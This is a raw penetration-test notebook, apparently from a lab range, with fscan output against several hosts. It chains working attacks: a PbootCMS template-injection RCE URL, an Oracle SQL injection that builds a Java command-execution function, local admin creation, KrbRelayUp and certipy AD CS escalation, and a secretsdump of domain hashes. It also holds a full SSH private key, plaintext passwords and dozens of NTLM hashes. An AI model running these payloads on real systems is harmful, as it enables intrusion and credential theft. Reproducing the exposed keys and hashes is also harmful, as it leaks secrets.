39.98.124.244

39.99.147.240

[2025-03-10 19:37:38] [INFO] 暴力破解线程数: 1
[2025-03-10 19:37:38] [INFO] 开始信息扫描
[2025-03-10 19:37:38] [INFO] 最终有效主机数量: 1
[2025-03-10 19:37:38] [INFO] 开始主机扫描
[2025-03-10 19:37:38] [INFO] 有效端口数量: 233
[2025-03-10 19:37:38] [SUCCESS] 端口开放 39.98.124.244:80
[2025-03-10 19:37:38] [SUCCESS] 端口开放 39.98.124.244:22
[2025-03-10 19:37:38] [SUCCESS] 服务识别 39.98.124.244:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-03-10 19:37:44] [SUCCESS] 服务识别 39.98.124.244:80 => [http] 版本:1.18.0 产品:nginx 系统:Linux 信息:Ubuntu
[2025-03-10 19:37:47] [INFO] 存活端口数量: 2
[2025-03-10 19:37:48] [INFO] 开始漏洞扫描
[2025-03-10 19:37:48] [INFO] 加载的插件: ssh, webpoc, webtitle
[2025-03-10 19:37:48] [SUCCESS] 网站标题 http://39.98.124.244      状态码:200 长度:481    标题:Search UserInfo
[2025-03-10 19:38:12] [SUCCESS] 扫描已完成: 3/3

[2025-03-10 19:38:58] [INFO] 暴力破解线程数: 1
[2025-03-10 19:38:58] [INFO] 开始信息扫描
[2025-03-10 19:38:58] [INFO] 最终有效主机数量: 1
[2025-03-10 19:38:58] [INFO] 开始主机扫描
[2025-03-10 19:38:58] [INFO] 有效端口数量: 233
[2025-03-10 19:38:58] [SUCCESS] 端口开放 39.99.147.240:22
[2025-03-10 19:38:58] [SUCCESS] 端口开放 39.99.147.240:80
[2025-03-10 19:38:58] [SUCCESS] 服务识别 39.99.147.240:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-03-10 19:39:04] [SUCCESS] 服务识别 39.99.147.240:80 => [http] 版本:1.18.0 产品:nginx 系统:Linux 信息:Ubuntu
[2025-03-10 19:39:08] [INFO] 存活端口数量: 2
[2025-03-10 19:39:08] [INFO] 开始漏洞扫描
[2025-03-10 19:39:08] [INFO] 加载的插件: ssh, webpoc, webtitle
[2025-03-10 19:39:08] [SUCCESS] 网站标题 http://39.99.147.240      状态码:200 长度:19781  标题:PbootCMS-永久开源免费的PHP企业网站开发建设管理系统
[2025-03-10 19:39:11] [SUCCESS] 检测到漏洞 http://39.99.147.240:80/www.zip poc-yaml-backup-file 参数:[{path www} {ext zip}]
[2025-03-10 19:39:17] [SUCCESS] 目标: http://39.99.147.240:80
  漏洞类型: poc-yaml-pbootcms-database-file-download
  漏洞名称:
  详细信息:
        author:abcRosexyz(https://github.com/abcRosexyz)
        links:https://www.cnblogs.com/0daybug/p/12786036.html
[2025-03-10 19:39:19] [SUCCESS] 目标: http://39.99.147.240:80
  漏洞类型: poc-yaml-phpstudy-nginx-wrong-resolve
  漏洞名称: php
  详细信息:
        author:LoRexxar(https://lorexxar.cn),0h1in9e(https://www.ohlinge.cn)
        links:https://www.seebug.org/vuldb/ssvid-98364
[2025-03-10 19:39:29] [SUCCESS] 扫描已完成: 3/3

http://39.99.147.240/?a=%7D%7Bpboot%7Buser%3Apassword%7D%3Aif((%22sys%5Cx74em%22)(%22eva%22.%22l('%22.(%22sys%5Cx74em%22)(%22whoami%22).%22')%22))%3B%2F%2F)%7Dxxx%7B%2Fpboot%7Buser%3Apassword%7D%3Aif%7D

[2025-03-10 20:08:58] [INFO] 暴力破解线程数: 1
[2025-03-10 20:08:58] [INFO] 开始信息扫描
[2025-03-10 20:08:58] [INFO] CIDR范围: 172.23.4.0-172.23.4.255
[2025-03-10 20:08:58] [INFO] 生成IP范围: 172.23.4.0.%!d(string=172.23.4.255) - %!s(MISSING).%!d(MISSING)
[2025-03-10 20:08:58] [INFO] 解析CIDR 172.23.4.32/24 -> IP范围 172.23.4.0-172.23.4.255
[2025-03-10 20:08:58] [INFO] 已排除指定主机: 1 个
[2025-03-10 20:08:58] [INFO] 最终有效主机数量: 255
[2025-03-10 20:08:59] [INFO] 开始主机扫描
[2025-03-10 20:08:59] [SUCCESS] 目标 172.23.4.12     存活 (ICMP)
[2025-03-10 20:08:59] [SUCCESS] 目标 172.23.4.19     存活 (ICMP)
[2025-03-10 20:08:59] [SUCCESS] 目标 172.23.4.51     存活 (ICMP)
[2025-03-10 20:09:02] [INFO] 存活主机数量: 3
[2025-03-10 20:09:02] [INFO] 有效端口数量: 233
[2025-03-10 20:09:02] [SUCCESS] 端口开放 172.23.4.19:80
[2025-03-10 20:09:02] [SUCCESS] 端口开放 172.23.4.19:22
[2025-03-10 20:09:02] [SUCCESS] 端口开放 172.23.4.51:445
[2025-03-10 20:09:02] [SUCCESS] 端口开放 172.23.4.12:445
[2025-03-10 20:09:02] [SUCCESS] 端口开放 172.23.4.51:139
[2025-03-10 20:09:02] [SUCCESS] 端口开放 172.23.4.12:139
[2025-03-10 20:09:02] [SUCCESS] 端口开放 172.23.4.51:135
[2025-03-10 20:09:02] [SUCCESS] 端口开放 172.23.4.12:135
[2025-03-10 20:09:02] [SUCCESS] 端口开放 172.23.4.51:1521
[2025-03-10 20:09:02] [SUCCESS] 服务识别 172.23.4.19:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-03-10 20:09:07] [SUCCESS] 服务识别 172.23.4.19:80 => [http] 版本:1.18.0 产品:nginx 系统:Linux 信息:Ubuntu
[2025-03-10 20:09:07] [SUCCESS] 服务识别 172.23.4.51:445 =>
[2025-03-10 20:09:07] [SUCCESS] 服务识别 172.23.4.12:445 =>
[2025-03-10 20:09:07] [SUCCESS] 服务识别 172.23.4.51:139 =>  Banner:[.]
[2025-03-10 20:09:07] [SUCCESS] 服务识别 172.23.4.12:139 =>  Banner:[.]
[2025-03-10 20:09:07] [SUCCESS] 服务识别 172.23.4.51:1521 =>
[2025-03-10 20:10:07] [SUCCESS] 服务识别 172.23.4.51:135 =>
[2025-03-10 20:10:07] [SUCCESS] 服务识别 172.23.4.12:135 =>
[2025-03-10 20:10:07] [INFO] 存活端口数量: 9
[2025-03-10 20:10:07] [INFO] 开始漏洞扫描
[2025-03-10 20:10:07] [INFO] 加载的插件: findnet, ms17010, netbios, oracle, smb, smb2, smbghost, ssh, webpoc, webtitle
[2025-03-10 20:10:07] [SUCCESS] NetInfo 扫描结果
目标主机: 172.23.4.12
主机名: IZMN9U6ZO3VTRNZ
发现的网络接口:
   IPv4地址:
      └─ 172.23.4.12
      └─ 172.24.7.16
[2025-03-10 20:10:07] [SUCCESS] NetBios 172.23.4.51     WORKGROUP\IZS8COQ1QJ2OUAZ
[2025-03-10 20:10:07] [SUCCESS] NetInfo 扫描结果
目标主机: 172.23.4.51
主机名: iZs8coq1qj2ouaZ
发现的网络接口:
   IPv4地址:
      └─ 172.23.4.51
[2025-03-10 20:10:07] [SUCCESS] NetBios 172.23.4.12     PENTEST\IZMN9U6ZO3VTRNZ
[2025-03-10 20:10:07] [SUCCESS] 网站标题 http://172.23.4.19        状态码:200 长度:481    标题:Search UserInfo

172.23.4.32 外网pbootcms
172.23.4.12   IZMN9U6ZO3VTRNZ -172.24.7.16
172.23.4.19
172.23.4.51 iZs8coq1qj2ouaZ

name=admin' union select 123,'qqq',123 from dual --

name=admin' union select 123,(select user from dual),(SELECT banner FROM v$version where banner like 'Oracle%25') from dual --

# USERINFO
admin' union select 123,(select user from dual),123 from dual --
# Oracle Database 11g Enterprise Edition Release 11.2.0.1.0 - 64bit Production
admin' union select 123,(SELECT banner FROM v$version where banner like 'Oracle%25'),123 from dual --
# 创建java库
admin' and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'';commit;end;') from dual)>1 --
# 赋予Java权限
admin' AND (SELECT dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate '' begin sys.dbms_cdc_publish.create_change_set('''' a'''',''''a'''',''''a''''''''||TEST.pwn()||''''''''a'''',''''Y'''',s ysdate,sysdate);end;''; commit; end;') from dual)>1--
# 创建函数
admin' and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace function LINXRUNCMD(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil.runCMD(java.lang.String) return String''''; '';commit;end;') from dual)>1--
# 赋予函数执行权限
admin' union select null,(select object_name from all_objects where object_name ='LINXRUNCMD' and rownum=1),null from dual--
# 执行
admin' union select null,(select LINXRUNCMD('whoami') from dual),null from dual--

admin' union select null,(select LINXRUNCMD('cmd.exe /c "dir"') from dual),null from dual--

net user natro92 123qwe!@# /add
net localgroup administrators natro92 /add

密码记事本
usera@pentest.me
Admin3gv83

KrbRelayUp.exe relay --domain xiaorang.lab --CreateNewComputerAccount --ComputerName test$  --ComputerPassword 123qwe!@#
KrbRelayUp.exe spawn -m rbcd -d xiaorang.lab -dc DC01.xiaorang.lab -cn test$ -cp 123qwe!@#

-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

[2025-03-10 22:09:08] [SUCCESS] 目标 172.24.7.23     存活 (ICMP)
[2025-03-10 22:09:08] [SUCCESS] 目标 172.24.7.3      存活 (ICMP)
[2025-03-10 22:09:08] [SUCCESS] 目标 172.24.7.27     存活 (ICMP)
[2025-03-10 22:09:08] [SUCCESS] 目标 172.24.7.43     存活 (ICMP)
[2025-03-10 22:09:08] [SUCCESS] 目标 172.24.7.48     存活 (ICMP)
[2025-03-10 22:09:08] [SUCCESS] 目标 172.24.7.5      存活 (ICMP)
[2025-03-10 22:09:11] [INFO] 存活主机数量: 6
[2025-03-10 22:09:11] [INFO] 有效端口数量: 233
[2025-03-10 22:09:11] [SUCCESS] 端口开放 172.24.7.3:80
[2025-03-10 22:09:11] [SUCCESS] 端口开放 172.24.7.23:80
[2025-03-10 22:09:11] [SUCCESS] 端口开放 172.24.7.23:22
[2025-03-10 22:09:11] [SUCCESS] 端口开放 172.24.7.27:22
[2025-03-10 22:09:11] [SUCCESS] 服务识别 172.24.7.23:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-03-10 22:09:11] [SUCCESS] 服务识别 172.24.7.27:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-03-10 22:09:13] [SUCCESS] 端口开放 172.24.7.5:88
[2025-03-10 22:09:13] [SUCCESS] 端口开放 172.24.7.3:88
[2025-03-10 22:09:14] [SUCCESS] 端口开放 172.24.7.3:135
[2025-03-10 22:09:14] [SUCCESS] 端口开放 172.24.7.43:135
[2025-03-10 22:09:14] [SUCCESS] 端口开放 172.24.7.48:135
[2025-03-10 22:09:14] [SUCCESS] 端口开放 172.24.7.5:135
[2025-03-10 22:09:15] [SUCCESS] 端口开放 172.24.7.48:139
[2025-03-10 22:09:15] [SUCCESS] 端口开放 172.24.7.3:139
[2025-03-10 22:09:15] [SUCCESS] 端口开放 172.24.7.5:389
[2025-03-10 22:09:15] [SUCCESS] 端口开放 172.24.7.3:389
[2025-03-10 22:09:15] [SUCCESS] 端口开放 172.24.7.5:139
[2025-03-10 22:09:15] [SUCCESS] 端口开放 172.24.7.43:139
[2025-03-10 22:09:15] [SUCCESS] 端口开放 172.24.7.3:445
[2025-03-10 22:09:16] [SUCCESS] 端口开放 172.24.7.5:445
[2025-03-10 22:09:16] [SUCCESS] 端口开放 172.24.7.48:445
[2025-03-10 22:09:16] [SUCCESS] 端口开放 172.24.7.43:445
[2025-03-10 22:09:16] [SUCCESS] 服务识别 172.24.7.23:80 => [http] 产品:nginx
[2025-03-10 22:09:17] [SUCCESS] 服务识别 172.24.7.3:80 => [http]
[2025-03-10 22:09:18] [SUCCESS] 服务识别 172.24.7.5:88 =>
[2025-03-10 22:09:18] [SUCCESS] 服务识别 172.24.7.3:88 =>
[2025-03-10 22:09:20] [SUCCESS] 服务识别 172.24.7.48:139 =>  Banner:[.]
[2025-03-10 22:09:20] [SUCCESS] 服务识别 172.24.7.3:139 =>  Banner:[.]
[2025-03-10 22:09:20] [SUCCESS] 服务识别 172.24.7.3:389 => [ldap] 产品:Microsoft Windows Active Directory LDAP 系统:Windows 信息:Domain: pentest.me, Site: Default-First-Site-Name
[2025-03-10 22:09:20] [SUCCESS] 服务识别 172.24.7.5:139 =>  Banner:[.]
[2025-03-10 22:09:21] [SUCCESS] 服务识别 172.24.7.43:139 =>  Banner:[.]
[2025-03-10 22:09:21] [SUCCESS] 服务识别 172.24.7.3:445 =>
[2025-03-10 22:09:21] [SUCCESS] 服务识别 172.24.7.5:445 =>
[2025-03-10 22:09:21] [SUCCESS] 服务识别 172.24.7.48:445 =>
[2025-03-10 22:09:21] [SUCCESS] 服务识别 172.24.7.43:445 =>
[2025-03-10 22:09:25] [SUCCESS] 服务识别 172.24.7.5:389 =>
[2025-03-10 22:09:36] [SUCCESS] 端口开放 172.24.7.23:8060
[2025-03-10 22:09:40] [SUCCESS] 端口开放 172.24.7.27:8090
[2025-03-10 22:09:40] [SUCCESS] 端口开放 172.24.7.27:8091
[2025-03-10 22:09:46] [SUCCESS] 服务识别 172.24.7.23:8060 => [http] 版本:1.20.1 产品:nginx
[2025-03-10 22:09:50] [SUCCESS] 服务识别 172.24.7.27:8091 => [http] Banner:[HTTP/1.1 414 Request-URI Too Long.text is empty (possibly HTTP/0.9)]
[2025-03-10 22:09:51] [SUCCESS] 服务识别 172.24.7.27:8090 => [http]
[2025-03-10 22:09:56] [SUCCESS] 端口开放 172.24.7.23:9094
[2025-03-10 22:10:02] [SUCCESS] 服务识别 172.24.7.23:9094 =>
[2025-03-10 22:10:19] [SUCCESS] 服务识别 172.24.7.3:135 =>
[2025-03-10 22:10:19] [SUCCESS] 服务识别 172.24.7.43:135 =>
[2025-03-10 22:10:19] [SUCCESS] 服务识别 172.24.7.48:135 =>
[2025-03-10 22:10:20] [SUCCESS] 服务识别 172.24.7.5:135 =>
[2025-03-10 22:10:20] [INFO] 存活端口数量: 24
[2025-03-10 22:10:20] [INFO] 开始漏洞扫描
[2025-03-10 22:10:20] [INFO] 加载的插件: findnet, ldap, ms17010, netbios, smb, smb2, smbghost, ssh, webpoc, webtitle
[2025-03-10 22:10:20] [SUCCESS] NetInfo 扫描结果
目标主机: 172.24.7.5
主机名: DCadmin
发现的网络接口:
   IPv4地址:
      └─ 172.25.12.7
      └─ 172.24.7.5
[2025-03-10 22:10:20] [SUCCESS] NetInfo 扫描结果
目标主机: 172.24.7.48
主机名: IZAYSXE6VCUHB4Z
发现的网络接口:
   IPv4地址:
      └─ 172.24.7.48
[2025-03-10 22:10:20] [SUCCESS] 网站标题 http://172.24.7.23        状态码:502 长度:3039   标题:GitLab is not responding (502)
[2025-03-10 22:10:20] [SUCCESS] NetInfo 扫描结果
目标主机: 172.24.7.43
主机名: IZMN9U6ZO3VTRPZ
发现的网络接口:
   IPv4地址:
      └─ 172.24.7.43
      └─ 172.26.8.12
[2025-03-10 22:10:20] [SUCCESS] NetInfo 扫描结果
目标主机: 172.24.7.3
主机名: DC
发现的网络接口:
   IPv4地址:
      └─ 172.24.7.3
      └─ 172.25.12.9
[2025-03-10 22:10:20] [SUCCESS] 网站标题 http://172.24.7.23:8060   状态码:404 长度:555    标题:404 Not Found
[2025-03-10 22:10:20] [SUCCESS] 网站标题 http://172.24.7.3         状态码:200 长度:703    标题:IIS Windows Server
[2025-03-10 22:10:20] [INFO] 系统信息 172.24.7.5 [Windows Server 2016 Standard 14393]
[2025-03-10 22:10:20] [SUCCESS] NetBios 172.24.7.43     PENTEST\IZMN9U6ZO3VTRPZ
[2025-03-10 22:10:20] [SUCCESS] NetBios 172.24.7.48     PENTEST\IZAYSXE6VCUHB4Z
[2025-03-10 22:10:20] [SUCCESS] NetBios 172.24.7.5      DC:DCadmin.pen.me                Windows Server 2016 Standard 14393
[2025-03-10 22:10:20] [INFO] 系统信息 172.24.7.3 [Windows Server 2016 Standard 14393]
[2025-03-10 22:10:20] [SUCCESS] NetBios 172.24.7.3      DC:DC.pentest.me                 Windows Server 2016 Standard 14393
[2025-03-10 22:10:20] [SUCCESS] 网站标题 http://172.24.7.27:8090   状态码:302 长度:0      标题:无标题 重定向地址: http://172.24.7.27:8090/login.action?os_destination=%2Findex.action&permissionViolation=true
[2025-03-10 22:10:20] [SUCCESS] 网站标题 http://172.24.7.27:8091   状态码:204 长度:0      标题:无标题
[2025-03-10 22:10:20] [SUCCESS] 目标: http://172.24.7.3:80
  漏洞类型: poc-yaml-active-directory-certsrv-detect
  漏洞名称:
  详细信息:
        author:AgeloVito
        links:https://www.cnblogs.com/EasonJim/p/6859345.html
[2025-03-10 22:10:31] [SUCCESS] 发现指纹 目标: http://172.24.7.27:8090/login.action?os_destination=%2Findex.action&permissionViolation=true 指纹: [ATLASSIAN-Confluence]
[2025-03-10 22:11:23] [SUCCESS] 扫描已完成: 44/44

crackmapexec.exe smb 172.24.7.1/24 -u "usera" -p "Admin3gv83" -M petitpotam

172.24.7.5 DCadmin.pen.me
172.24.7.48 IZAYSXE6VCUHB4Z.pentest.me
172.24.7.16 IZMN9U6ZO3VTRNZ.pentest.me
172.24.7.3 DC.pentest.me
172.24.7.43 IZMN9U6ZO3VTRPZ.pentest.me

certipy account create -u usera@pentest.me -p Admin3gv83 -dc-ip 172.24.7.3 -user 'TEST$' -pass '123qwe!@#' -dns 'DC.pentest.me'

certipy req -u 'TEST$@pentest.me' -p '123qwe!@#' -ca pentest-DC-CA -dc-ip 172.24.7.3  -template machine -debug

certipy auth -pfx dc.pfx -dc-ip 172.24.7.3

secretsdump.py pentest.me/dc$@172.24.7.3 -hashes :1b1e5da161021a928ddb7962ce0e314a -dc-ip 172.24.7.3

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5d0f79eaf7a6c0ad70bcfce6522d2da1:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:08b1732d06c09e84119486cbb94a5569:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pentest.me\usera:1105:aad3b435b51404eeaad3b435b51404ee:3e60b861888eb6978cb426570b624df0:::
pentest.me\userb:1107:aad3b435b51404eeaad3b435b51404ee:ca7d33f074a52e6a880ace12f1eb2e7d:::
pentest.me\userc:1109:aad3b435b51404eeaad3b435b51404ee:43f746d8610c30d3576ea2f41932062c:::
pentest.me\gouhaobo:1113:aad3b435b51404eeaad3b435b51404ee:8cad7bd4c33a03c9154015a73c920e35:::
pentest.me\fuhongchang:1114:aad3b435b51404eeaad3b435b51404ee:8cad7bd4c33a03c9154015a73c920e35:::
pentest.me\liyichun:1115:aad3b435b51404eeaad3b435b51404ee:0e78f6d0e6c715473a7859a1d2102634:::
pentest.me\dingyangxi:1116:aad3b435b51404eeaad3b435b51404ee:6c3cc7aea9b4c9d9001898215e818f0a:::
pentest.me\quxingxiu:1117:aad3b435b51404eeaad3b435b51404ee:b66e7ce440e8eb8fed5106239ad22b02:::
pentest.me\kanxinghua:1118:aad3b435b51404eeaad3b435b51404ee:d1c0da92cdc4ad8622b031879c920f3c:::
pentest.me\luzizhuo:1119:aad3b435b51404eeaad3b435b51404ee:1cbec9dfcdade512f2b886ac55dfab5d:::
pentest.me\duguangxi:1120:aad3b435b51404eeaad3b435b51404ee:d7fb6ef27df893965ef33a7d8e85d824:::
pentest.me\wenhetai:1121:aad3b435b51404eeaad3b435b51404ee:2c6ea9b2878ee236ba1132897fe0ef94:::
pentest.me\jingjun4zhi:1122:aad3b435b51404eeaad3b435b51404ee:2b8f892534fcdd266cc37203605d505f:::
pentest.me\nengkangbo:1123:aad3b435b51404eeaad3b435b51404ee:cbe26534f6b98e4fd841ace467327779:::
pentest.me\quepengzu:1124:aad3b435b51404eeaad3b435b51404ee:14aa36f95d997500cf384a5285dfd77c:::
pentest.me\hongyuhang:1125:aad3b435b51404eeaad3b435b51404ee:44cc0d62d2f5b423a39c63f85cce39be:::
pentest.me\jitiancheng:1126:aad3b435b51404eeaad3b435b51404ee:fabb61695e6db714ffba720fc8793da8:::
pentest.me\xingjinghuan:1127:aad3b435b51404eeaad3b435b51404ee:6b764e2cb60905be1ad575b8e2c4b666:::
pentest.me\wenyulong:1128:aad3b435b51404eeaad3b435b51404ee:2b5a92df2be808f864a294ecf2bdbbc1:::
pentest.me\chekaifeng:1129:aad3b435b51404eeaad3b435b51404ee:bd6cd16ff9d521bb2716c7a3ff69b8be:::
pentest.me\niejun4ren:1130:aad3b435b51404eeaad3b435b51404ee:cb84989167d558ac2945569dace6b170:::
pentest.me\jufeihang:1131:aad3b435b51404eeaad3b435b51404ee:0697688dda32699960bf94b842149525:::
pentest.me\wuchengjiao:1132:aad3b435b51404eeaad3b435b51404ee:fbf01ddca787b9fc9503d94bff3d1268:::
pentest.me\ranjingfu:1133:aad3b435b51404eeaad3b435b51404ee:d1762f0e39ecbbc436b5d3b1cc946e9e:::
pentest.me\nongxuehai:1134:aad3b435b51404eeaad3b435b51404ee:6371c54e3842a0b127f66776060d5582:::
pentest.me\jianghongcai:1135:aad3b435b51404eeaad3b435b51404ee:fdc6137bf9f1ed67431651ea2719cbf4:::
pentest.me\lihaochu:1136:aad3b435b51404eeaad3b435b51404ee:14bff78443bfbf4b2963db873ed50a9e:::
pentest.me\zhongyongge:1137:aad3b435b51404eeaad3b435b51404ee:8590b0288615f568409fd85b9de27d92:::
pentest.me\yitianjiao:1138:aad3b435b51404eeaad3b435b51404ee:c77f975155e7a39d70e2eeb436fb5c44:::
pentest.me\gongliangzhe:1139:aad3b435b51404eeaad3b435b51404ee:e973c3e7194493c1ce2f631355faa42a:::
pentest.me\yuzhengcheng:1140:aad3b435b51404eeaad3b435b51404ee:5ff648a835c55a056d1bf5f114fc64ed:::
pentest.me\taiyuande:1141:aad3b435b51404eeaad3b435b51404ee:84b3f6c323d057502f8def18e79c4578:::
pentest.me\shenhongkuo:1142:aad3b435b51404eeaad3b435b51404ee:ccf4ceb6208ed153bb1904b05e0b2258:::
pentest.me\fanjincheng:1143:aad3b435b51404eeaad3b435b51404ee:ac0a033d46b75ac670e76b0080f42a84:::
pentest.me\weijingshuo:1144:aad3b435b51404eeaad3b435b51404ee:fa9fd905218b2a7318818b57ac23ee09:::
pentest.me\shuangliqin:1145:aad3b435b51404eeaad3b435b51404ee:d39a6b7f9eaa0fd029db53948183f7c5:::
pentest.me\eyongjia:1146:aad3b435b51404eeaad3b435b51404ee:31e8410c021bcfb31f2401f698c3d457:::
pentest.me\lihongguang:1147:aad3b435b51404eeaad3b435b51404ee:f66ff4ec163fff12db896f2780ddfb97:::
pentest.me\binghongzhen:1148:aad3b435b51404eeaad3b435b51404ee:6818556802fbd87074539232522da5f6:::
pentest.me\guixuyao:1149:aad3b435b51404eeaad3b435b51404ee:6549ba72f26141f49fa3f439ed1a481f:::
pentest.me\fanghanhan:1150:aad3b435b51404eeaad3b435b51404ee:9b1bcf349dc00f0f98b8e34248734c6c:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:1b1e5da161021a928ddb7962ce0e314a:::
IZMN9U6ZO3VTRNZ$:1106:aad3b435b51404eeaad3b435b51404ee:0e1183c781abc6bc9515f6d6fd2f2919:::
IZMN9U6ZO3VTRPZ$:1108:aad3b435b51404eeaad3b435b51404ee:6d252ff1c3ff45778dec169e6c24cc06:::
IZAYSXE6VCUHB4Z$:1110:aad3b435b51404eeaad3b435b51404ee:99b061fff48cc93b7d7cfd63a3442b3d:::
